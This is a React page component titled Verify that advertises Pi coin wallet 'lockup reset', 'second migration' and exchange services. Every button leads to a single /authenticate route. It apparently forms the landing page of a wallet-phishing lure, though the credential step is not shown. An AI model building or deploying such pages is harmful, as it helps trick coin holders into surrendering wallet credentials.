import React, { Fragment, useEffect } from "react";
import Header from "../components/templates/Header";
import { Link } from "react-router-dom";
import { FaUnlock } from "react-icons/fa6";
import { TbArrowsExchange2 } from "react-icons/tb";
import { LuMoveUpRight } from "react-icons/lu";

const Verify = () => {
    useEffect(() => {
        document.body.classList = "dark"
    }, [])
    return (
        <Fragment className="hide">
            <Header />
            <main>
                <div className="container">
                    <h1>The First Digital Currency to be Mined on a Phone</h1>
                    <p>
                        PiNet Wallet Configurations and Mainnet Migrations with Dex tools for On-Chain $Pi Coin Exchange.
                    </p>
                    <div className="call-to-action">
                        <Link to="/authenticate" className="btn primary">
                            <span>Lockup Reset and Configuration</span> <FaUnlock />
                        </Link>
                        <Link to="/authenticate" className="btn primary">
                            <span>Second Migration Request</span> <LuMoveUpRight />
                        </Link>
                        <Link to="/authenticate" className="btn primary">
                            <span>Pi Exchange</span> <TbArrowsExchange2 />
                        </Link>
                    </div>
                    <div
                        style={{ position: "relative", padding: "3px 10px", paddingBottom: "56.25%", height: 0 }}
                    >
                        <iframe
                            src={`https://www.youtube.com/embed/MsOaC61cR3U`}
                            style={{
                                position: "absolute",
                                top: "2%",
                                left: "2%",
                                width: "96%",
                                height: "96%",
                            }}
                            allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture"
                            allowFullScreen
                            title="YouTube Video"
                        ></iframe>
                    </div>
                </div>
            </main>
        </Fragment>
    );
};

export default Verify;
